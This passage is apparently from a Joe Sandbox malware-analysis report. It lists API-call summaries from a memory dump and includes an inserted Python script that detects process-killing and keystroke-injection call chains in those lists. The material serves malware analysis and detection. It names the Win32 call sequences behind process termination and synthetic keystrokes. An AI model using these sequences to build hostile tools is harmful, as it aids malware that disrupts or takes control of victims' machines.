                                                    • _wcscat.LIBCMT ref: 00F774D2
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F774E9
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F77517
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcscat
                                                    • String ID: SysListView32
                                                    • API String ID: 307300125-78025650
                                                    • Opcode ID: d6ecf10e3439bef8ac015bad08c4c6612a3c7153eaec37974cae9d0335964264
                                                    • Instruction ID: b907debf66c10ea2d7fae9322c33e42778657dbda2c13f7298010a3ff68455f2
                                                    • Opcode Fuzzy Hash: d6ecf10e3439bef8ac015bad08c4c6612a3c7153eaec37974cae9d0335964264
                                                    • Instruction Fuzzy Hash: 0E41A471A14348AFDB21EF64CC85FEE77A8EF08360F10446AF948A7191D7719D84EB51
                                                    APIs
                                                      • Part of subcall function 00F54148: CreateToolhelp32Snapshot.KERNEL32 ref: 00F5416D
                                                      • Part of subcall function 00F54148: Process32FirstW.KERNEL32(00000000,?), ref: 00F5417B
                                                      • Part of subcall function 00F54148: CloseHandle.KERNEL32(00000000), ref: 00F54245
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F6F08D
                                                    • GetLastError.KERNEL32 ref: 00F6F0A0
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F6F0CF
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F6F14C
                                                    • GetLastError.KERNEL32(00000000), ref: 00F6F157
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F6F18C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 2533919879-2896544425
                                                    • Opcode ID: 5743f38d2cdebd8277c75db6a2ad65f5555ce7b50b73b4e447838bbc64118fb5
                                                    • Instruction ID: d9cb47025f5498c8518e1ee91106dbe71fb03076afcae3d7339269faae349aac
                                                    • Opcode Fuzzy Hash: 5743f38d2cdebd8277c75db6a2ad65f5555ce7b50b73b4e447838bbc64118fb5
                                                    • Instruction Fuzzy Hash: 5541D0712003019FD725EF24DCA5F7EB7A5AF84724F048419FA069F2D2CB79A808EB95
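The two API chains that matter most in the entries above are easy to miss in raw form: the keystroke-injection sequence (AttachThreadInput in a helper, then PostMessageW with message 0x100/0x101 and key 0x25/0x27) and the process-termination sequence in this entry (a Toolhelp32 snapshot walk in subcall 00F54148, OpenProcess with access 0x00000001, TerminateProcess, alongside the SeDebugPrivilege string). The following is an added example, not Joe Sandbox or Vidar code: a parser for the "• Api.MODULE(args), ref: addr" bullet format these summaries use, a decoder that resolves the hex constants the plugin leaves raw (0x100 is WM_KEYDOWN, 0x101 is WM_KEYUP, 0x25 is VK_LEFT, 0x27 is VK_RIGHT, access 0x1 to OpenProcess is PROCESS_TERMINATE), and an ordered-subsequence matcher for those chains. The pattern labels are my own; the sample blocks are copied from the two entries, with the Sleep calls between key events omitted.

```python
"""Decode the 'APIs' bullet lists of a Joe Sandbox function summary.

Added example for this report, not Joe Sandbox or Vidar code: the two sample
blocks are copied from the summaries above, the pattern labels are mine and
the constants come from the Win32 SDK headers.
"""
import re
from dataclasses import dataclass

WM_KEYDOWN, WM_KEYUP = 0x0100, 0x0101
VK_NAMES = {0x09: "VK_TAB", 0x0D: "VK_RETURN", 0x25: "VK_LEFT", 0x27: "VK_RIGHT"}
PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0010: "PROCESS_VM_READ",
                  0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION"}
# "• Api.MODULE(arg,arg,...), ref: ADDR"  or  "• Api.MODULE ref: ADDR"
_CALL_RE = re.compile(r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
                      r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

@dataclass
class Call:
    api: str
    module: str
    args: list     # int for hex literals, None for '?', str for anything else
    ref: int       # address of the call site
    subcall: bool  # listed as 'Part of subcall function ...'

def _arg(tok: str):
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]+", tok) else tok

def parse_block(text: str) -> list:
    """Parse one 'APIs' list into Call records, keeping the listed order."""
    calls = []
    for line in text.splitlines():
        m = _CALL_RE.search(line)
        if not m:
            continue  # 'APIs' / 'Strings' headers carry no call
        raw = m.group("args")
        calls.append(Call(m.group("api"), m.group("module"),
                          [_arg(t) for t in raw.split(",")] if raw else [],
                          int(m.group("ref"), 16), "Part of subcall" in line))
    return calls

def _mask_names(value: int, table: dict) -> str:
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    return "|".join(names + ([hex(rest)] if rest else [])) or "0"

def describe(call: Call) -> str:
    """Render a call with the constants the report leaves as raw hex resolved."""
    a = call.args
    if call.api == "PostMessageW" and len(a) >= 3 and a[1] in (WM_KEYDOWN, WM_KEYUP):
        msg = "WM_KEYDOWN" if a[1] == WM_KEYDOWN else "WM_KEYUP"
        key = VK_NAMES.get(a[2], hex(a[2])) if isinstance(a[2], int) else "?"
        return f"{call.api}: {msg} {key}"
    if call.api == "OpenProcess" and a and isinstance(a[0], int):
        return f"{call.api}: access={_mask_names(a[0], PROCESS_ACCESS)}"
    return call.api

# Ordered API subsequences that together indicate a behaviour (labels are mine).
PATTERNS = {
    "process-kill": ["CreateToolhelp32Snapshot", "Process32FirstW", "OpenProcess", "TerminateProcess"],
    "keystroke-injection": ["AttachThreadInput", "PostMessageW"],
    "child-process": ["CreateProcessW"],
}

def _in_order(names: list, wanted: list) -> bool:
    it = iter(names)  # one shared iterator makes this an ordered-subsequence test
    return all(any(n == w for n in it) for w in wanted)

def match_patterns(calls: list) -> list:
    names = [c.api for c in calls]
    hits = [label for label, seq in PATTERNS.items() if _in_order(names, seq)]
    key_event = any(c.api == "PostMessageW" and len(c.args) > 1
                    and c.args[1] in (WM_KEYDOWN, WM_KEYUP) for c in calls)
    if "keystroke-injection" in hits and not key_event:
        hits.remove("keystroke-injection")  # PostMessageW of some non-key message
    return hits

# Constructed samples: 'APIs' lists copied from the summaries above (Sleep calls omitted).
KEYSTROKE_BLOCK = """\
  • Part of subcall function 00F4B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F4B54D
  • Part of subcall function 00F4B52D: GetCurrentThreadId.KERNEL32 ref: 00F4B554
  • Part of subcall function 00F4B52D: AttachThreadInput.USER32(00000000,?,00F4A23B,?,00000001), ref: 00F4B55B
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00F4A246
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F4A263
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00F4A26F
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F4A28D
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00F4A299
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F4A2B0
"""
KILL_BLOCK = """\
  • Part of subcall function 00F54148: CreateToolhelp32Snapshot.KERNEL32 ref: 00F5416D
  • Part of subcall function 00F54148: Process32FirstW.KERNEL32(00000000,?), ref: 00F5417B
  • Part of subcall function 00F54148: CloseHandle.KERNEL32(00000000), ref: 00F54245
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F6F08D
• GetLastError.KERNEL32 ref: 00F6F0A0
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F6F0CF
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00F6F14C
• GetLastError.KERNEL32(00000000), ref: 00F6F157
• CloseHandle.KERNEL32(00000000), ref: 00F6F18C
"""
```

Paste any "APIs" list from the report into parse_block and feed the result to match_patterns and describe. Subcall lines are kept (and flagged) on purpose: the snapshot walk that feeds the kill loop lives in helper 00F54148, so a matcher that only looked at the function's own calls would see OpenProcess and TerminateProcess but never the enumeration that precedes them.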
                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00F5357C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    • Opcode ID: 06acea9bb2ec7012a7d36f5c5e29cc2c6e22c82a6ab2b31ae6c32ae78f0a7dc8
                                                    • Instruction ID: 0d8de0e1ce24be9261d72f4fab5208ebba1139a052b67a1eacbf391e457fab8a
                                                    • Opcode Fuzzy Hash: 06acea9bb2ec7012a7d36f5c5e29cc2c6e22c82a6ab2b31ae6c32ae78f0a7dc8
                                                    • Instruction Fuzzy Hash: AB11EB72A48347BEA7005A58DC92DAA779CDF063F1F64101EFF0066182F764AF4476A1
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F54802
                                                    • LoadStringW.USER32(00000000), ref: 00F54809
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F5481F
                                                    • LoadStringW.USER32(00000000), ref: 00F54826
                                                    • _wprintf.LIBCMT ref: 00F5484C
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F5486A
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00F54847
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 3648134473-3128320259
                                                    • Opcode ID: d84387334fed9fa10c8fe39571cc82701e6af152e4f8a87a161dc21131c51aca
                                                    • Instruction ID: 27842b454a3d99582f058fa80dac859d8c72c363ad93a4012a0f9e877f31c16c
                                                    • Opcode Fuzzy Hash: d84387334fed9fa10c8fe39571cc82701e6af152e4f8a87a161dc21131c51aca
                                                    • Instruction Fuzzy Hash: E90162F294030C7FE791A7A09D89EF6736CEB08301F800595BB49E2041EA74AE889B75
APIs
  • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
• GetSystemMetrics.USER32(0000000F), ref: 00F7DB42
• GetSystemMetrics.USER32(0000000F), ref: 00F7DB62
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F7DD9D
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F7DDBB
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F7DDDC
• ShowWindow.USER32(00000003,00000000), ref: 00F7DDFB
• InvalidateRect.USER32(?,00000000,00000001), ref: 00F7DE20
• DefDlgProcW.USER32(?,00000005,?,?), ref: 00F7DE43
Memory Dump Source
• Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-0
• Opcode ID: d020839b6f36141f4583b9bb84318ed3e16f333913e8bcddf819317b733cdfe1
• Instruction ID: c31f7020cdf622ab9cfa5aaadc3e7dc4ca1623a99b475089e01798d01d275253
• Opcode Fuzzy Hash: d020839b6f36141f4583b9bb84318ed3e16f333913e8bcddf819317b733cdfe1
• Instruction Fuzzy Hash: 42B18831A00219ABDF15CF69C985BBD7BB1BF44710F48C06AEC489E295D770A950EBA1
APIs
  • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
  • Part of subcall function 00F7147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7040D,?,?), ref: 00F71491
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F7044E
Memory Dump Source
• Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
Similarity
• API ID: BuffCharConnectRegistryUpper_memmove
• String ID:
• API String ID: 3479070676-0
• Opcode ID: 7237bdb2ff49e8820d56b53fe70524e91cac615766db98403d162f6547406d6b
• Instruction ID: 5324aaf3a18397b8584fbbb8dc0aa0032c58389e9c34125059f504cc2d5be706
• Opcode Fuzzy Hash: 7237bdb2ff49e8820d56b53fe70524e91cac615766db98403d162f6547406d6b
• Instruction Fuzzy Hash: 81A17971204205DFCB10EF24CC91F6EBBE5AF84314F04891DF99A972A2DB35E945EB42
APIs
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F2C508,00000004,00000000,00000000,00000000), ref: 00EF2E9F
• ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00F2C508,00000004,00000000,00000000,00000000,000000FF), ref: 00EF2EE7
• ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00F2C508,00000004,00000000,00000000,00000000), ref: 00F2C55B
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F2C508,00000004,00000000,00000000,00000000), ref: 00F2C5C7
Memory Dump Source
• Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: 904e7d9373c4c29c771a9893b044a6f3afc12edcb5ce408bbd2b27efd96e14bc
• Instruction ID: 3d1f07b403ea530a1780378ca5fbf93258c7c1b1a60ca5050389aa5f9993024a
• Opcode Fuzzy Hash: 904e7d9373c4c29c771a9893b044a6f3afc12edcb5ce408bbd2b27efd96e14bc
• Instruction Fuzzy Hash: B441283160468C9AC7368B28DC887BE7B92BB85314F78A40EE747675A0CB75F840EB51
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 00F57698
  • Part of subcall function 00F10FE6: std::exception::exception.LIBCMT ref: 00F1101C
  • Part of subcall function 00F10FE6: __CxxThrowException@8.LIBCMT ref: 00F11031
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F576CF
• EnterCriticalSection.KERNEL32(?), ref: 00F576EB
• _memmove.LIBCMT ref: 00F57739
• _memmove.LIBCMT ref: 00F57756
• LeaveCriticalSection.KERNEL32(?), ref: 00F57765
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F5777A
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00F57799
Memory Dump Source
• Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 256516436-0
• Opcode ID: dfb4d10943dc6f26778c1a3cab89fe1aad298bce51c073624a8432d9b25db828
• Instruction ID: f4a9ffa7ff836dad0f2a8aa99080c23f30e78edd33bca92dc5704fe590b122f9
• Opcode Fuzzy Hash: dfb4d10943dc6f26778c1a3cab89fe1aad298bce51c073624a8432d9b25db828
• Instruction Fuzzy Hash: 1B31B271904208EBCB50EF54EC85EAEB7B8FF49310F1440A5FE04AB246DB749E54EBA0
APIs
• DeleteObject.GDI32(00000000), ref: 00F76810
• GetDC.USER32(00000000), ref: 00F76818
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F76823
• ReleaseDC.USER32(00000000,00000000), ref: 00F7682F
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F7686B
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F7687C
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F7964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00F768B6
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F768D6
Memory Dump Source
• Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: 5fa5c0902ac91b23bd8f2350d1ce6c6cd805efe5175fe2cee525e5fceff9f165
• Instruction ID: f07ec3624ff58dd5dd13be77879c7fac2554ac184038a6c2a96a10b01b6d8592
• Opcode Fuzzy Hash: 5fa5c0902ac91b23bd8f2350d1ce6c6cd805efe5175fe2cee525e5fceff9f165
• Instruction Fuzzy Hash: FE318B72201614BFEB108F10CC8AFFA3BA9EF49761F044065FE08EA291DB759855DBB5
APIs
Memory Dump Source
• Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: e3f290ec29582d80ff5ea5feeba385d259e67d52cad46f888fdbba9d2a54f212
• Instruction ID: bb42de508c2b8ce3382c0bbb9a2d06b0edb2ab54cbffb23c88e32af1d5935bd0
• Opcode Fuzzy Hash: e3f290ec29582d80ff5ea5feeba385d259e67d52cad46f888fdbba9d2a54f212
• Instruction Fuzzy Hash: 9021F973B022057BD65475118D82FEB3FACAE11BA4F085020FE06A6352F715DE11F6E6
APIs
  • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
  • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
  • Part of subcall function 00F0436A: _wcscpy.LIBCMT ref: 00F0438D
• _wcstok.LIBCMT ref: 00F5F2D7
• _wcscpy.LIBCMT ref: 00F5F366
• _memset.LIBCMT ref: 00F5F399
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
• Opcode ID: 7979c7cc7a2cf7cf6303107ac22df1b2cef662566d62c280aefb722c2c1432ee
• Instruction ID: c9c51a8e176a880bca7a8b8778b490fe3438c1637208e14375217fc03933a844
• Opcode Fuzzy Hash: 7979c7cc7a2cf7cf6303107ac22df1b2cef662566d62c280aefb722c2c1432ee
• Instruction Fuzzy Hash: A3C19F716043409FD714EF24C881A6FB7E4BF85350F04496DFA99972A2DB34EC49EB82
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F672EB
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F6730C
• WSAGetLastError.WSOCK32(00000000), ref: 00F6731F
• htons.WSOCK32(?,?,?,00000000,?), ref: 00F673D5
• inet_ntoa.WSOCK32(?), ref: 00F67392
  • Part of subcall function 00F4B4EA: _strlen.LIBCMT ref: 00F4B4F4
  • Part of subcall function 00F4B4EA: _memmove.LIBCMT ref: 00F4B516
• _strlen.LIBCMT ref: 00F6742F
• _memmove.LIBCMT ref: 00F67498
Memory Dump Source
• Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
Similarity
• API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
• String ID:
• API String ID: 3619996494-0
• Opcode ID: 98db580e93876fcce201a3f27194f050a8477d1eacbe706c77bfac49d4dbdcd3
• Instruction ID: bc8fcfc5871c47ca629c17a348cb0bec18b4463afa1fc235bf1dd0fbf4941715
• Opcode Fuzzy Hash: 98db580e93876fcce201a3f27194f050a8477d1eacbe706c77bfac49d4dbdcd3
• Instruction Fuzzy Hash: 7F81B172608304ABD310EB24CC95E6BB7E8AF84714F10451CFA56AB2D2DF74DD45DB91
Memory Dump Source
• Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1331b6aa5a82c5a4d586f39ec770164d368bbffdd1d06bd448f6e6d9d4d950a5
• Instruction ID: 2beaf57c45562326c74dfe8c2e51108c193ca978daa2a0de0fde316cfd293718
• Opcode Fuzzy Hash: 1331b6aa5a82c5a4d586f39ec770164d368bbffdd1d06bd448f6e6d9d4d950a5
• Instruction Fuzzy Hash: A3714C3090014DEFCB08DF59CD49AFEBBB5FF86324F148199EA15AA251C7349A51DFA0
APIs
• IsWindow.USER32(01464A90), ref: 00F7BA5D
• IsWindowEnabled.USER32(01464A90), ref: 00F7BA69
• SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00F7BB4D
• SendMessageW.USER32(01464A90,000000B0,?,?), ref: 00F7BB84
• IsDlgButtonChecked.USER32(?,?), ref: 00F7BBC1
• GetWindowLongW.USER32(01464A90,000000EC), ref: 00F7BBE3
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F7BBFB
Memory Dump Source
• Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
